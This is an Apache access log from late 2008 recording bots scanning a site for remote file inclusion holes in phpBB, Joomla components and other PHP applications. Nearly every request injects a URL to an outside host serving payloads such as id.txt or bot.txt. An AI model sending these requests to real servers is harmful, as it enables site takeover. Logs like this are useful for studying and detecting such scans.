69.57.150.98 - - [30/Nov/2008:16:47:10 -0800] "GET /logs//admin/admin_smilies.php?phpbb_root_path=http://www.tecfedericotaylor.edu.gt/components/idne.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.57.150.98 - - [30/Nov/2008:16:47:35 -0800] "GET /logs/access_080629.log//admin/admin_smilies.php?phpbb_root_path=http://www.tecfedericotaylor.edu.gt/components/idne.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:16:47:50 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:16:47:50 -0800] "GET /logs/access_080427.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:16:47:51 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:47:54 -0800] "GET /logs/access_080512.log/errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:49:56 -0800] "GET /logs/access_080811.log//include/admin.lib.inc.php?site_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:49:56 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:49:56 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:50:49 -0800] "GET /logs/access_080901.log//include/admin.lib.inc.php?site_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
8.7.26.27 - - [30/Nov/2008:16:52:59 -0800] "GET /logs/access_080602.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://evy.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
8.7.26.27 - - [30/Nov/2008:16:52:59 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://evy.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
8.7.26.27 - - [30/Nov/2008:16:53:00 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://evy.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:53:45 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
125.244.186.2 - - [30/Nov/2008:16:53:52 -0800] "GET /load_lang.php?_SERWEB[serwebdir]=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
209.216.227.32 - - [30/Nov/2008:16:53:53 -0800] "GET /logs/access_080804.log/?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
209.216.227.32 - - [30/Nov/2008:16:53:53 -0800] "GET /?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.summitcircle.com"
209.216.227.32 - - [30/Nov/2008:16:53:54 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif??? HTTP/1.1" 200 5228 "-" "libwww-perl/5.79" "www.summitcircle.com"
125.244.186.2 - - [30/Nov/2008:16:54:17 -0800] "GET /load_lang.php?_SERWEB[serwebdir]=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
77.221.130.11 - - [30/Nov/2008:16:54:22 -0800] "GET /logs/access_080427.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.221.130.11 - - [30/Nov/2008:16:54:23 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.221.130.11 - - [30/Nov/2008:16:54:23 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
8.7.26.27 - - [30/Nov/2008:16:54:27 -0800] "GET /logs/access_080707.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://evy.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.49.188.178 - - [30/Nov/2008:16:54:50 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.happybass.com/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.49.188.178 - - [30/Nov/2008:16:54:51 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.happybass.com/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:55:03 -0800] "GET /errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.22.82.133 - - [30/Nov/2008:16:55:22 -0800] "GET /logs/?index.php?sourcedir=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 200 5228 "-" "Mozilla/5.0" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:16:55:22 -0800] "GET /logs/access_080602.log/?index.php?sourcedir=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:16:55:22 -0800] "GET /?index.php?sourcedir=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:55:26 -0800] "GET /logs/access_080512.log/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:55:26 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:55:26 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.214.122.25 - - [30/Nov/2008:16:56:00 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://forum.happybass.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
38.98.60.188 - - [30/Nov/2008:16:56:13 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
38.98.60.188 - - [30/Nov/2008:16:56:13 -0800] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
38.98.60.188 - - [30/Nov/2008:16:56:13 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:16:56:33 -0800] "GET /logs/access_080602.log%20%20/?index.php?sourcedir=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:16:57:28 -0800] "GET /logs/access_080526.log%20%20/?index.php?sourcedir=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
77.221.130.11 - - [30/Nov/2008:16:57:32 -0800] "GET /logs/access_080519.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:16:57:49 -0800] "GET /logs/access_080629.log/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
38.98.60.188 - - [30/Nov/2008:16:58:23 -0800] "GET /logs/access_080707.log/errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
38.98.60.188 - - [30/Nov/2008:16:58:24 -0800] "GET /logs/errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
38.98.60.188 - - [30/Nov/2008:16:58:24 -0800] "GET /errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:16:58:52 -0800] "GET /logs/access_080602.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.93.8 - - [30/Nov/2008:17:01:09 -0800] "GET /logs/access_080602.log/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
38.98.60.188 - - [30/Nov/2008:17:01:44 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
38.98.60.188 - - [30/Nov/2008:17:01:55 -0800] "GET /logs/access_080505.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
38.98.60.188 - - [30/Nov/2008:17:03:02 -0800] "GET /logs/access_080505.log/errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
38.98.60.188 - - [30/Nov/2008:17:03:05 -0800] "GET /errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:05:04 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:05:04 -0800] "GET /logs/access_080818.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:05:04 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:05:11 -0800] "GET /logs/access_080818.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:05:11 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:05:11 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
211.43.212.94 - - [30/Nov/2008:17:05:12 -0800] "GET /logs/access_080427.log/errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
211.43.212.94 - - [30/Nov/2008:17:05:12 -0800] "GET /errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
211.43.212.94 - - [30/Nov/2008:17:05:12 -0800] "GET /logs/errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:05:16 -0800] "GET /logs/access_080804.log/?index.php?sourcedir=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:06:31 -0800] "GET /logs/access_080512.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:06:49 -0800] "GET /logs/access_080512.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
61.220.51.14 - - [30/Nov/2008:17:06:57 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "summitcircle.com"
206.221.251.145 - - [30/Nov/2008:17:07:50 -0800] "GET /logs/access_081005.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
206.221.251.145 - - [30/Nov/2008:17:07:50 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
206.221.251.145 - - [30/Nov/2008:17:07:51 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:07:56 -0800] "GET /logs/access_080811.log/index.php?redir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:07:56 -0800] "GET /logs/index.php?redir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:07:56 -0800] "GET /index.php?redir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
211.43.212.94 - - [30/Nov/2008:17:08:01 -0800] "GET /logs/access_080427.log/errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
211.43.212.94 - - [30/Nov/2008:17:08:01 -0800] "GET /logs/errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
211.43.212.94 - - [30/Nov/2008:17:08:01 -0800] "GET /errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:08:04 -0800] "GET /logs/access.log/index.php?redir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:08:38 -0800] "GET /logs/access_080811.log/index.php?redir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:08:38 -0800] "GET /index.php?redir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:08:38 -0800] "GET /logs/index.php?redir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.44.134.23 - - [30/Nov/2008:17:08:47 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.moneytec.com/trader/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.summitcircle.com"
207.44.134.23 - - [30/Nov/2008:17:08:47 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.moneytec.com/trader/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.summitcircle.com"
85.214.37.182 - - [30/Nov/2008:17:08:48 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.catstrand.co.uk/modules/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.summitcircle.com"
85.214.37.182 - - [30/Nov/2008:17:08:48 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.catstrand.co.uk/modules/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:08:54 -0800] "GET /logs/access.log/index.php?redir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:09:17 -0800] "GET /logs/access_080526.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:09:17 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:09:17 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
77.221.130.16 - - [30/Nov/2008:17:10:36 -0800] "GET /index.php?redir=http://forum.happybass.com/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
77.221.130.16 - - [30/Nov/2008:17:10:36 -0800] "GET /logs/access_080811.log/index.php?redir=http://forum.happybass.com/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
77.221.130.16 - - [30/Nov/2008:17:10:36 -0800] "GET /logs/index.php?redir=http://forum.happybass.com/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
77.221.130.16 - - [30/Nov/2008:17:11:08 -0800] "GET /logs/access.log/index.php?redir=http://forum.happybass.com/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
121.125.79.167 - - [30/Nov/2008:17:12:03 -0800] "GET /logs/access_080811.log/index.php?redir=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
121.125.79.167 - - [30/Nov/2008:17:12:03 -0800] "GET /index.php?redir=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
121.125.79.167 - - [30/Nov/2008:17:12:03 -0800] "GET /logs/index.php?redir=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:12:16 -0800] "GET /logs/access_080629.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:12:16 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:12:17 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.205.7.217 - - [30/Nov/2008:17:12:21 -0800] "GET /index.php?redir=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:12:21 -0800] "GET /logs/access_080629.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:12:21 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:12:21 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.205.7.217 - - [30/Nov/2008:17:12:26 -0800] "GET /index.php?redir=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:12:31 -0800] "GET /index.php?redir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:12:50 -0800] "GET /logs/access_080526.log/?index.php?sourcedir=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:12:53 -0800] "GET /logs/access_080629.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:12:53 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:12:54 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:13:57 -0800] "GET /logs/access_080526.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
